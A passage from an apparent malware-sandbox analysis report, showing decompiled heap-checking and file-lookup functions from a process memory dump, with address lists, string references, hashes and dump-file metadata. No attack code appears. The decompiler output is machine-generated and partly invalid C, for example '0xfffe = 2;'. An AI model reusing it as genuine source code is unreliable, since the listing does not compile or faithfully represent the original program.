										 *( *((intOrPtr*)(_t253 + 0x1c)) + (_v12 >> 5) * 4) =  *( *((intOrPtr*)(_t253 + 0x1c)) + (_v12 >> 5) * 4) &  !(1 << (_v12 & 0x0000001f));
									} else {
										 *_t137 = _t228;
									}
									goto L8;
									L57:
									 *(_t239 +  *((intOrPtr*)(_t253 + 0x20))) = _t139;
									goto L8;
								}
								L38:
								_t139 =  *_a8;
								_t183 = _a4;
								__eflags = _t139 -  *((intOrPtr*)(_t253 + 0x18));
								if(_t139 ==  *((intOrPtr*)(_t253 + 0x18))) {
									L44:
									_t140 =  *((intOrPtr*)(_t253 + 0x20));
									_t91 = _t140 + _t239;
									 *_t91 =  *(_t140 + _t239) & 0x00000000;
									__eflags =  *_t91;
									goto L45;
								}
								__eflags =  *(_t183 + 0x4c);
								if( *(_t183 + 0x4c) == 0) {
									_t220 =  *(_t139 - 8) & 0x0000ffff;
								} else {
									_t226 =  *(_t139 - 8);
									__eflags =  *(_t183 + 0x4c) & _t226;
									if(( *(_t183 + 0x4c) & _t226) != 0) {
										_t226 = _t226 ^  *(_t183 + 0x50);
										__eflags = _t226;
									}
									_t220 = _t226 & 0x0000ffff;
								}
								__eflags = ( *(_a8 + 0xfffffff8) & 0x0000ffff) - (_t220 & 0x0000ffff);
								_t183 = _a4;
								if(__eflags == 0) {
									goto L57;
								} else {
									goto L44;
								}
							} else {
								_t183 = _a4;
								goto L8;
							}
						}
						L8:
						_t145 = _v8 -  *((intOrPtr*)(_t232 + 0x14));
						_v20 = _t145;
						if( *((intOrPtr*)(_t232 + 8)) != 0) {
							_t145 = _t145 + _t145;
						}
						 *((intOrPtr*)(_t232 + 0xc)) =  *((intOrPtr*)(_t232 + 0xc)) + 1;
						_t246 = _t145 << 2;
						_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t232 + 0x20)) + _t246));
						if(_v8 ==  *((intOrPtr*)(_t232 + 4)) - 1) {
							 *((intOrPtr*)(_t232 + 0x10)) =  *((intOrPtr*)(_t232 + 0x10)) + 1;
						}
						if(_t204 != 0) {
							__eflags =  *(_t183 + 0x4c);
							if( *(_t183 + 0x4c) == 0) {
								_t149 =  *(_t204 - 8) & 0x0000ffff;
							} else {
								_t182 =  *(_t204 - 8);
								__eflags =  *(_t183 + 0x4c) & _t182;
								if(( *(_t183 + 0x4c) & _t182) != 0) {
									_t182 = _t182 ^  *(_t183 + 0x50);
									__eflags = _t182;
								}
								_t149 = _t182 & 0x0000ffff;
							}
							_t188 = _t149 & 0x0000ffff;
							__eflags = ( *(_a8 + 0xfffffff8) & 0x0000ffff) - (_t149 & 0x0000ffff);
							if(__eflags <= 0) {
								goto L13;
							} else {
								goto L14;
							}
						} else {
							L13:
							_t188 = _a8;
							 *((intOrPtr*)(_t246 +  *((intOrPtr*)(_t232 + 0x20)))) = _a8;
							L14:
							if(_t204 == 0) {
								 *( *((intOrPtr*)(_t232 + 0x1c)) + (_v20 >> 5) * 4) =  *( *((intOrPtr*)(_t232 + 0x1c)) + (_v20 >> 5) * 4) | 1 << (_v20 & 0x0000001f);
							}
							if( *0x9d77b0 >= 1) {
								_t156 = _v8 -  *((intOrPtr*)(_t232 + 0x14));
								_t233 =  *((intOrPtr*)(_t232 + 0x1c));
								_t248 = _t156 >> 5;
								__eflags =  *( *((intOrPtr*)(_t232 + 0x1c)) + (_t156 >> 5) * 4) & 1 << (_t156 & 0x0000001f);
								if(__eflags != 0) {
									goto L17;
								}
								_t169 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t169 + 0xc);
								if( *(_t169 + 0xc) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))");
								E0094373B();
								E0099F826(_t188, _t233, _t248, _t253, 1);
								goto L17;
							} else {
								L17:
								_t183 = _a4;
								if( *(_t183 + 0x4c) != 0) {
									_t166 = _a8;
									_t167 = _t166 + 0xfffffff8;
									_t167[0] =  *(_t166 - 6) ^  *(_t166 - 7) ^  *_t167;
									 *_t167 =  *_t167 ^  *(_t183 + 0x50);
								}
								_t133 =  *((intOrPtr*)(_a8 + 4));
								_a8 = _t133;
								if(_t183 + 0xc4 != _t133) {
									_t235 = _a8;
									continue;
								} else {
									goto L20;
								}
							}
						}
						L35:
						_v8 = _t134;
						goto L7;
					}
				}
			}










































                                                0x00911492
                                                0x00911496
                                                0x0091149b
                                                0x009114a4
                                                0x0091322c
                                                0x0091322d
                                                0x00913230
                                                0x00913232
                                                0x00913232
                                                0x00913232
                                                0x00913237
                                                0x00913259
                                                0x00913259
                                                0x009114aa
                                                0x009114b0
                                                0x009114b3
                                                0x009114b8
                                                0x009115a0
                                                0x009115a4
                                                0x00000000
                                                0x009114be
                                                0x009114be
                                                0x009114c5
                                                0x009114ca
                                                0x009114d7
                                                0x00962c82
                                                0x00962c84
                                                0x00962c85
                                                0x00962c86
                                                0x00962c86
                                                0x009114d7
                                                0x009114dd
                                                0x009114e0
                                                0x009114e5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009114eb
                                                0x009114eb
                                                0x009114eb
                                                0x009114ef
                                                0x00000000
                                                0x00000000
                                                0x00913343
                                                0x00913345
                                                0x00913348
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00913348
                                                0x009114f9
                                                0x009114fc
                                                0x009114ff
                                                0x00913260
                                                0x00913263
                                                0x00913265
                                                0x00913267
                                                0x00913267
                                                0x0091326a
                                                0x0091326d
                                                0x00913271
                                                0x00913274
                                                0x00913276
                                                0x00913276
                                                0x00913276
                                                0x0091327d
                                                0x00913280
                                                0x00913284
                                                0x00913287
                                                0x00913290
                                                0x00913293
                                                0x00913295
                                                0x00913297
                                                0x00913297
                                                0x0091329a
                                                0x0091329b
                                                0x0091329e
                                                0x009132a0
                                                0x009132a2
                                                0x009132a2
                                                0x009132a2
                                                0x009132a2
                                                0x009132a5
                                                0x009132a8
                                                0x009132ab
                                                0x00913443
                                                0x00913446
                                                0x00913448
                                                0x00962c93
                                                0x00962c95
                                                0x00000000
                                                0x00000000
                                                0x00962cab
                                                0x00962cad
                                                0x00962cb0
                                                0x00962cb3
                                                0x00962cbc
                                                0x00913491
                                                0x009134a9
                                                0x00962cb5
                                                0x00962cb5
                                                0x00962cb5
                                                0x00000000
                                                0x00962c9d
                                                0x00962ca0
                                                0x00000000
                                                0x00962ca0
                                                0x0091344e
                                                0x00913451
                                                0x00913453
                                                0x00913456
                                                0x00913459
                                                0x0091348a
                                                0x0091348a
                                                0x0091348d
                                                0x0091348d
                                                0x0091348d
                                                0x00000000
                                                0x0091348d
                                                0x0091345b
                                                0x0091345f
                                                0x00934c2e
                                                0x00913465
                                                0x00913465
                                                0x00913468
                                                0x0091346b
                                                0x0091346d
                                                0x0091346d
                                                0x0091346d
                                                0x00913470
                                                0x00913470
                                                0x0091347f
                                                0x00913481
                                                0x00913484
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009132b1
                                                0x009132b1
                                                0x00000000
                                                0x009132b1
                                                0x009132ab
                                                0x00911505
                                                0x00911508
                                                0x0091150f
                                                0x00911512
                                                0x00911514
                                                0x00911514
                                                0x00911516
                                                0x0091151e
                                                0x00911521
                                                0x0091152b
                                                0x0091152d
                                                0x0091152d
                                                0x00911532
                                                0x00934bff
                                                0x00934c03
                                                0x00934c37
                                                0x00934c05
                                                0x00934c05
                                                0x00934c08
                                                0x00934c0b
                                                0x00934c0d
                                                0x00934c0d
                                                0x00934c0d
                                                0x00934c10
                                                0x00934c10
                                                0x00934c13
                                                0x00934c21
                                                0x00934c23
                                                0x00000000
                                                0x00934c29
                                                0x00000000
                                                0x00934c29
                                                0x00911538
                                                0x00911538
                                                0x0091153b
                                                0x0091153e
                                                0x00911541
                                                0x00911543
                                                0x0091155b
                                                0x0091155b
                                                0x00911564
                                                0x00962cc7
                                                0x00962cca
                                                0x00962cd9
                                                0x00962cdc
                                                0x00962cdf
                                                0x00000000
                                                0x00000000
                                                0x00962ceb
                                                0x00962cee
                                                0x00962cf2
                                                0x00962d14
                                                0x00962d19
                                                0x00962cf4
                                                0x00962d0c
                                                0x00962d11
                                                0x00962d1f
                                                0x00962d24
                                                0x00962d2c
                                                0x00000000
                                                0x0091156a
                                                0x0091156a
                                                0x0091156a
                                                0x00911571
                                                0x00911573
                                                0x0091157c
                                                0x00911581
                                                0x00911587
                                                0x00911587
                                                0x0091158c
                                                0x00911595
                                                0x0091159a
                                                0x00913435
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0091159a
                                                0x00911564
                                                0x0091334e
                                                0x0091334e
                                                0x00000000
                                                0x0091334e
                                                0x009114be

                                                Strings
                                                • HEAP: , xrefs: 00962D14
                                                • HEAP[%wZ]: , xrefs: 00962D07
                                                • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 00962D1F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                • API String ID: 0-1596344177
                                                • Opcode ID: ddc32566831ce2014947a20b715fe2d9fb1b14a6192399cb9190242c7b30e970
                                                • Instruction ID: ab44e044ddae1e5dec6c62f3c54bc7cf3a4c6ac81afcfc5d7c611e10eea7939c
                                                • Opcode Fuzzy Hash: ddc32566831ce2014947a20b715fe2d9fb1b14a6192399cb9190242c7b30e970
                                                • Instruction Fuzzy Hash: C2B1AF7170060ADFCB28CF28C494AB9B7F1FF49310B5586A9E9A68B691D734E980DF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0098579A, Relevance: 3.9, Strings: 3, Instructions: 142COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E0098579A(void* __ecx, signed int _a4, unsigned int _a8) {
				intOrPtr _t42;
				signed short _t43;
				signed char _t44;
				signed short _t45;
				signed int _t47;
				signed char _t48;
				signed int _t49;
				signed int _t51;
				void* _t52;
				signed short _t67;
				signed short _t69;
				signed short _t79;
				signed char _t87;
				void* _t88;
				signed int _t91;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int _t105;

				_t105 = _a8;
				_t42 =  *((intOrPtr*)(_t105 + 7));
				if(_t42 == 1) {
					return _t42;
				}
				_t87 = 0x3f;
				if(_t42 != 4) {
					if(_t42 >= 0) {
						_t91 = _a4;
						if( *(_t91 + 0x4c) == 0) {
							_t43 =  *_t105 & 0x0000ffff;
						} else {
							_t79 =  *_t105;
							if(( *(_t91 + 0x4c) & _t79) != 0) {
								_t79 = _t79 ^  *(_t91 + 0x50);
							}
							_t43 = _t79 & 0x0000ffff;
						}
					} else {
						_t91 = _a4;
						_t43 =  *((intOrPtr*)((_t105 >> 0x00000003 ^  *_t105 ^  *0x9d00a4 ^ _t91) + 0x10));
					}
					_t100 = _t43 & 0x0000ffff;
					_t44 =  *((intOrPtr*)(_t105 + 7));
					if(_t44 != 5) {
						if((_t44 & 0x00000040) == 0) {
							if((_t44 & _t87) == _t87) {
								if(_t44 >= 0) {
									if( *(_t91 + 0x4c) == 0) {
										_t45 =  *_t105 & 0x0000ffff;
									} else {
										_t69 =  *_t105;
										if(( *(_t91 + 0x4c) & _t69) != 0) {
											_t69 = _t69 ^  *(_t91 + 0x50);
										}
										_t45 = _t69 & 0x0000ffff;
									}
								} else {
									_t45 =  *((intOrPtr*)((_t105 >> 0x00000003 ^  *_t105 ^  *0x9d00a4 ^ _t91) + 0x10));
								}
								_t47 =  *(_t105 + (_t45 & 0x0000ffff) * 8 - 4);
							} else {
								_t47 = _t44 & 0x000000ff & _t87;
							}
						} else {
							_t47 =  *(_t105 + 4 + (_t44 & 0x000000ff & _t87) * 8) & 0x0000ffff;
						}
					} else {
						_t47 =  *(_t91 + 0x54) & 0x0000ffff ^  *(_t105 + 4) & 0x0000ffff;
					}
					_t102 = (_t100 << 3) - _t47;
					goto L25;
				} else {
					_t102 = E00985766(_a4, _t105);
					L25:
					_t48 =  *((intOrPtr*)(_t105 + 7));
					if(_t48 != 5) {
						if((_t48 & 0x00000040) == 0) {
							_t49 = 0;
							L31:
							_t103 = _t102 + (_t49 & 0x0000ffff);
							_t34 = _t105 + 8; // 0x9
							_t88 = _t103 + _t34;
							_t51 = E00928900(_t88, 0x985918, 8);
							_a4 = _t51;
							if(_t51 == 8) {
								_t52 = 1;
							} else {
								if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t103);
								_push(_a4 + _t88);
								E0094373B("Heap block at %p modified at %p past requested size of %lx\n", _t105);
								E009A06F9(_t105);
								_t52 = 0;
							}
							return _t52;
						}
						_t67 = _t48 & _t87 & 0x000000ff;
						L27:
						_t49 = _t67 << 0x00000003 & 0x0000ffff;
						goto L31;
					}
					_t67 =  *(_t105 + 6) & 0x000000ff;
					goto L27;
				}
			}






















                                                0x009857a0
                                                0x009857a3
                                                0x009857a8
                                                0x00985914
                                                0x00985914
                                                0x009857b2
                                                0x009857b5
                                                0x009857c9
                                                0x009857e5
                                                0x009857ec
                                                0x009857fd
                                                0x009857ee
                                                0x009857ee
                                                0x009857f3
                                                0x009857f5
                                                0x009857f5
                                                0x009857f8
                                                0x009857f8
                                                0x009857cb
                                                0x009857da
                                                0x009857df
                                                0x009857df
                                                0x00985800
                                                0x00985803
                                                0x00985808
                                                0x00985818
                                                0x0098582c
                                                0x00985837
                                                0x00985854
                                                0x00985865
                                                0x00985856
                                                0x00985856
                                                0x0098585b
                                                0x0098585d
                                                0x0098585d
                                                0x00985860
                                                0x00985860
                                                0x00985839
                                                0x0098584a
                                                0x0098584a
                                                0x0098586b
                                                0x0098582e
                                                0x00985831
                                                0x00985831
                                                0x0098581a
                                                0x0098581f
                                                0x0098581f
                                                0x0098580a
                                                0x00985812
                                                0x00985812
                                                0x00985872
                                                0x00000000
                                                0x009857b7
                                                0x009857c0
                                                0x00985874
                                                0x00985874
                                                0x00985879
                                                0x0098588b
                                                0x00985895
                                                0x00985897
                                                0x0098589c
                                                0x009858a3
                                                0x009858a3
                                                0x009858a8
                                                0x009858ad
                                                0x009858b3
                                                0x0098590e
                                                0x009858b5
                                                0x009858c2
                                                0x009858e4
                                                0x009858e9
                                                0x009858c4
                                                0x009858dc
                                                0x009858e1
                                                0x009858f2
                                                0x009858f5
                                                0x009858fc
                                                0x00985905
                                                0x0098590a
                                                0x0098590a
                                                0x00000000
                                                0x00985911
                                                0x0098588f
                                                0x00985880
                                                0x00985884
                                                0x00000000
                                                0x00985884
                                                0x0098587b
                                                0x00000000
                                                0x0098587b

                                                Strings
                                                • HEAP: , xrefs: 009858E4
                                                • HEAP[%wZ]: , xrefs: 009858D7
                                                • Heap block at %p modified at %p past requested size of %lx, xrefs: 009858F7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %lx
                                                • API String ID: 0-3722492067
                                                • Opcode ID: 8c83cf739a7a05e210e4a7dd85a33f23aa6041792251b2e3bddccd3c81eb9336
                                                • Instruction ID: 468048565d721a9a30cf871280bfe1f96c20aac7700758f916695cb669589de4
                                                • Opcode Fuzzy Hash: 8c83cf739a7a05e210e4a7dd85a33f23aa6041792251b2e3bddccd3c81eb9336
                                                • Instruction Fuzzy Hash: 9B411235220914DFD360AF29C844AB273E5EF44751B96885AF8D6CB382D729DC4AEB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009B3A83, Relevance: 2.8, Strings: 2, Instructions: 307COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 76%
                                                			E009B3A83(void* __ecx, char __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16, signed int _a24) {
				signed int _v8;
				char _v530;
				char _v554;
				signed char _v556;
				intOrPtr _v560;
				unsigned int _v564;
				signed int _v568;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				char _v624;
				char _v625;
				unsigned int _v632;
				short _v634;
				signed int _v636;
				signed short* _v640;
				short _v642;
				signed int _v644;
				char _v645;
				char _v652;
				unsigned int _v656;
				intOrPtr* _v660;
				intOrPtr _v664;
				signed short _v668;
				char _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				signed int _v688;
				signed short* _v692;
				intOrPtr _v696;
				char _v700;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t136;
				signed int _t144;
				intOrPtr* _t154;
				unsigned int _t160;
				short _t167;
				signed int _t169;
				void* _t174;
				signed short* _t175;
				intOrPtr* _t179;
				signed short _t206;
				void* _t219;
				intOrPtr _t224;
				signed int _t228;
				signed short _t229;
				unsigned int _t231;
				unsigned int _t232;
				char _t233;
				void* _t234;
				void* _t235;
				signed int _t236;
				intOrPtr* _t242;
				short _t243;
				signed int _t244;

				_t233 = __edx;
				_t136 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t136 ^ _t244;
				_t241 = _a4;
				0xfffe = 2;
				_v660 = _a12;
				if(_a8 >= 0xfffe || _a16 >= 0xfffe) {
					L51:
					_push(((0 | _a16 != 0x0000fffe) - 0x00000001 & 0xffffffdb) + 0x57);
					goto L52;
				} else {
					_t236 = _a24;
					if((_t236 & 0xfffffffe) != 0) {
						goto L51;
					}
					E008FE2A8(__ecx,  &_v668, _t241);
					_v645 =  *((short*)(_v664 + ((_v668 & 0x0000ffff) >> 1) * 2 - 2)) == 0x2e;
					if(E0092182F(_t241,  &_v636,  &_v640, 0) != 0) {
						_t242 = _v640;
						_t154 = _t242;
						_t234 = _t154 + 2;
						do {
							_t224 =  *_t154;
							_t154 = _t154 + 0xfffe;
						} while (_t224 != 0);
						_t225 = _v632;
						_v644 = (_t154 - _t234 >> 1) + (_t154 - _t234 >> 1);
						_v642 = _v644 + 2;
						_t160 = _t225;
						_t235 = _t160 + 2;
						do {
							_t219 =  *_t160;
							_t160 = _t160 + 2;
						} while (_t219 != 0);
						_v636 = (_t160 - _t235 >> 1) + (_t160 - _t235 >> 1);
						_t233 = 0;
						_v634 = _v636 + 2;
						_v656 = _t225;
						if(_t242 == 0) {
							_t167 = 0;
						} else {
							_t167 = _t225 - _t242 + _v636;
						}
						_v644 = _t167;
						_v642 = _t167;
						if(_t242 != _t233) {
							_t243 = _t242 - _t225;
							_v636 = _t243;
							_v634 = _t243;
						}
						_t169 = (_v636 & 0x0000ffff) >> 1;
						if( *((short*)(_t225 + _t169 * 2 - 4)) == 0x3a ||  *((short*)(_t225 + _t169 * 2 - 2)) == 0x5c) {
							_v625 = _t233;
						} else {
							_v636 = _v636 + 0xfffe;
							_v625 = 1;
						}
						_v688 =  !(_t236 << 6) & 0x00000040;
						_v692 =  &_v636;
						_push(0x4021);
						_push(3);
						_push( &_v676);
						_push( &_v700);
						_t241 = 0x100001;
						_push(0x100001);
						_v700 = 0x18;
						_v696 = _t233;
						_v684 = _t233;
						_v680 = _t233;
						_t174 = E008EFD74( &_v652);
						if(_t174 == 0xc000000d || _t174 == 0xc0000103) {
							if(_v625 != 0) {
								_v636 = _v636 + 2;
								_push(0x4021);
								_push(3);
								_push( &_v676);
								_push( &_v700);
								_push(_t241);
								_t174 = E008EFD74( &_v652);
								_v636 = _v636 + 0xfffe;
							}
						}
						_t236 = 0;
						if(_t174 >= 0) {
							if(_v644 != 0) {
								if(_v644 != 6 || E00928900(_v640, ?str?, 6) != 6) {
									_t225 = _v644 & 0x0000ffff;
									_t175 = _v640;
									_t233 = 0;
									if((_v644 & 0xfffe) <= 0) {
										L43:
										if(_v645 != 0 &&  *(_t175 - 2) == 0x2a) {
											_t225 = 0x3c;
											 *(_t175 - 2) = _t225;
										}
										goto L46;
									} else {
										goto L31;
									}
									do {
										L31:
										if(_t233 != _t236 &&  *_t175 == 0x2e &&  *(_t175 - 2) == 0x2a) {
											_t231 = 0x3c;
											 *(_t175 - 2) = _t231;
										}
										_t228 =  *_t175 & 0x0000ffff;
										if(_t228 == 0x3f) {
											_t229 = 0x3e;
											 *_t175 = _t229;
											goto L39;
										} else {
											if(_t228 == 0x2a) {
												L39:
												if(_t233 != _t236 &&  *(_t175 - 2) == 0x2e) {
													_t232 = 0x22;
													 *(_t175 - 2) = _t232;
												}
												goto L42;
											}
										}
										L42:
										_t233 = _t233 + 1;
										_t225 = (_v644 & 0x0000ffff) >> 1;
										_t175 =  &(_t175[1]);
									} while (_t233 < (_v644 & 0x0000ffff) >> 1);
									goto L43;
								} else {
									_t206 = 2;
									_v644 = _t206;
									L46:
									_push(_t236);
									_push( &_v644);
									_push(1);
									_push(3);
									_push(0x268);
									_push( &_v624);
									_push( &_v676);
									_push(_t236);
									_push(_t236);
									_push(_t236);
									_t179 = E008EFDA8(_v652);
									_t241 = _t179;
									E008FE025(_t225,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t236, _v656);
									if(_t179 < _t236) {
										L26:
										_t144 = E008EF9F0(_v652);
										goto L53;
									}
									_t241 = _v660;
									 *_t241 = _v568;
									 *((intOrPtr*)(_t241 + 4)) = _v616;
									 *((intOrPtr*)(_t241 + 8)) = _v612;
									 *((intOrPtr*)(_t241 + 0xc)) = _v608;
									 *((intOrPtr*)(_t241 + 0x10)) = _v604;
									 *((intOrPtr*)(_t241 + 0x14)) = _v600;
									 *((intOrPtr*)(_t241 + 0x18)) = _v596;
									 *((intOrPtr*)(_t241 + 0x1c)) = _v580;
									 *((intOrPtr*)(_t241 + 0x20)) = _v584;
									E00908980(_t241 + 0x2c,  &_v530, _v564);
									 *((short*)(_t241 + 0x2c + (_v564 >> 1) * 2)) = 0;
									E00908980(_t241 + 0x234,  &_v554, _v556);
									 *((short*)(_t241 + 0x234 + (_v556 >> 1) * 2)) = 0;
									if((_v568 & 0x00000400) != 0) {
										 *((intOrPtr*)(_t241 + 0x24)) = _v560;
									}
									if(E009B3A14(_v652) == _t236) {
										goto L26;
									} else {
										goto L54;
									}
								}
							}
							E008FE025(_t225,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v656);
							goto L26;
						} else {
							_t144 = E008FE025(_t225,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v656);
							goto L53;
						}
					} else {
						_push(3);
						L52:
						_t144 = E008F230F();
						L53:
						_t145 = _t144 | 0xffffffff;
						L54:
						return E008FE1B4(_t145, 0xfffe, _v8 ^ _t244, _t233, _t236, _t241);
					}
				}
			}

































































                                                0x009b3a83
                                                0x009b3a8e
                                                0x009b3a95
                                                0x009b3a9d
                                                0x009b3aa3
                                                0x009b3aa7
                                                0x009b3aad
                                                0x009b3eb2
                                                0x009b3ec1
                                                0x00000000
                                                0x009b3abc
                                                0x009b3abc
                                                0x009b3ac5
                                                0x00000000
                                                0x00000000
                                                0x009b3ad3
                                                0x009b3afe
                                                0x009b3b0c
                                                0x009b3b15
                                                0x009b3b1b
                                                0x009b3b1d
                                                0x009b3b20
                                                0x009b3b20
                                                0x009b3b23
                                                0x009b3b25
                                                0x009b3b2a
                                                0x009b3b36
                                                0x009b3b46
                                                0x009b3b4d
                                                0x009b3b4f
                                                0x009b3b52
                                                0x009b3b52
                                                0x009b3b56
                                                0x009b3b57
                                                0x009b3b62
                                                0x009b3b72
                                                0x009b3b74
                                                0x009b3b7b
                                                0x009b3b83
                                                0x009b3b91
                                                0x009b3b85
                                                0x009b3b89
                                                0x009b3b89
                                                0x009b3b93
                                                0x009b3b9a
                                                0x009b3ba3
                                                0x009b3ba5
                                                0x009b3ba7
                                                0x009b3bae
                                                0x009b3bae
                                                0x009b3bbc
                                                0x009b3bc9
                                                0x009b3be5
                                                0x009b3bd3
                                                0x009b3bd5
                                                0x009b3bdc
                                                0x009b3bdc
                                                0x009b3bf3
                                                0x009b3bff
                                                0x009b3c0a
                                                0x009b3c0b
                                                0x009b3c13
                                                0x009b3c1a
                                                0x009b3c1b
                                                0x009b3c20
                                                0x009b3c28
                                                0x009b3c32
                                                0x009b3c38
                                                0x009b3c3e
                                                0x009b3c44
                                                0x009b3c4e
                                                0x009b3c5e
                                                0x009b3c60
                                                0x009b3c68
                                                0x009b3c69
                                                0x009b3c71
                                                0x009b3c78
                                                0x009b3c79
                                                0x009b3c81
                                                0x009b3c86
                                                0x009b3c86
                                                0x009b3c5e
                                                0x009b3c8d
                                                0x009b3c91
                                                0x009b3cb7
                                                0x009b3ce9
                                                0x009b3d0e
                                                0x009b3d15
                                                0x009b3d1b
                                                0x009b3d23
                                                0x009b3d76
                                                0x009b3d7d
                                                0x009b3d88
                                                0x009b3d89
                                                0x009b3d89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009b3d25
                                                0x009b3d25
                                                0x009b3d27
                                                0x009b3d38
                                                0x009b3d39
                                                0x009b3d39
                                                0x009b3d3d
                                                0x009b3d44
                                                0x009b3d50
                                                0x009b3d51
                                                0x00000000
                                                0x009b3d46
                                                0x009b3d4a
                                                0x009b3d54
                                                0x009b3d56
                                                0x009b3d61
                                                0x009b3d62
                                                0x009b3d62
                                                0x00000000
                                                0x009b3d56
                                                0x009b3d4c
                                                0x009b3d66
                                                0x009b3d6d
                                                0x009b3d6f
                                                0x009b3d71
                                                0x009b3d72
                                                0x00000000
                                                0x009b3d02
                                                0x009b3d04
                                                0x009b3d05
                                                0x009b3d8d
                                                0x009b3d8d
                                                0x009b3d94
                                                0x009b3d95
                                                0x009b3d97
                                                0x009b3d99
                                                0x009b3da4
                                                0x009b3dab
                                                0x009b3dac
                                                0x009b3dad
                                                0x009b3dae
                                                0x009b3db5
                                                0x009b3dc0
                                                0x009b3dcf
                                                0x009b3dd6
                                                0x009b3cd1
                                                0x009b3cd7
                                                0x00000000
                                                0x009b3cd7
                                                0x009b3ddc
                                                0x009b3de8
                                                0x009b3df6
                                                0x009b3dff
                                                0x009b3e08
                                                0x009b3e11
                                                0x009b3e1a
                                                0x009b3e23
                                                0x009b3e2c
                                                0x009b3e35
                                                0x009b3e43
                                                0x009b3e52
                                                0x009b3e6d
                                                0x009b3e80
                                                0x009b3e92
                                                0x009b3e9a
                                                0x009b3e9a
                                                0x009b3eaa
                                                0x00000000
                                                0x009b3eb0
                                                0x00000000
                                                0x009b3eb0
                                                0x009b3eaa
                                                0x009b3ce9
                                                0x009b3ccc
                                                0x00000000
                                                0x009b3c93
                                                0x009b3ca6
                                                0x00000000
                                                0x009b3ca6
                                                0x009b3b0e
                                                0x009b3b0e
                                                0x009b3ec2
                                                0x009b3ec2
                                                0x009b3ec7
                                                0x009b3ec7
                                                0x009b3eca
                                                0x009b3ed8
                                                0x009b3ed8
                                                0x009b3b0c

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
